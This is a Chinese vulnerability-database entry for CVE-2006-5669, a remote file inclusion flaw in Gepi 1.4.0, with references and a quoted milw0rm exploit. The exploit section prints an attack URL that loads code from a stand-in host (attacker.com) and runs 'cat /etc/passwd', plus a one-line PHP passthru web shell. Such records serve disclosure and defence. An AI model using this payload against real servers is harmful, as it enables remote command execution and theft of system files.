Gepi gestion/savebackup.php 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111438 漏洞类型 输入验证
发布时间 2006-10-31 更新时间 2006-11-06
CVE编号 CVE-2006-5669 CNNVD-ID CNNVD-200611-025
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2692
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-025
|漏洞详情
Gepi中的gestion/savebackup.php存在PHP远程文件包含漏洞,远程攻击者可以通过在文件名参数内的URL来执行任意PHP代码。
|漏洞EXP
Package:- gepi 1.4.0
http://adullact.net/frs/download.php/992/gepi-1.4.0.tar.gz

impact:- highly critical ..System Access..
vulnerable code:-
      include($_GET['filename']);
in gepi/gestion/savebackup.php

Exploit:-
http://localhost/gepi/gestion/savebackup.php?filename=http://attacker.com/test.txt&cmd=cat
/etc/passwd

in test.txt
<? passthru("$_GET[cmd]");?>

Credits:-
$um$id

# milw0rm.com [2006-10-31]
|参考资料

来源:BID
名称:20830
链接:http://www.securityfocus.com/bid/20830
来源:XF
名称:gepi-savebackup-file-include(29921)
链接:http://xforce.iss.net/xforce/xfdb/29921
来源:MILW0RM
名称:2692
链接:http://www.milw0rm.com/exploits/2692
来源:VIM
名称:20061102SourceVERIFYandpatchforgepiRFI
链接:http://www.attrition.org/pipermail/vim/2006-November/001104.html
来源:MILW0RM
名称:2692
链接:http://milw0rm.com/exploits/2692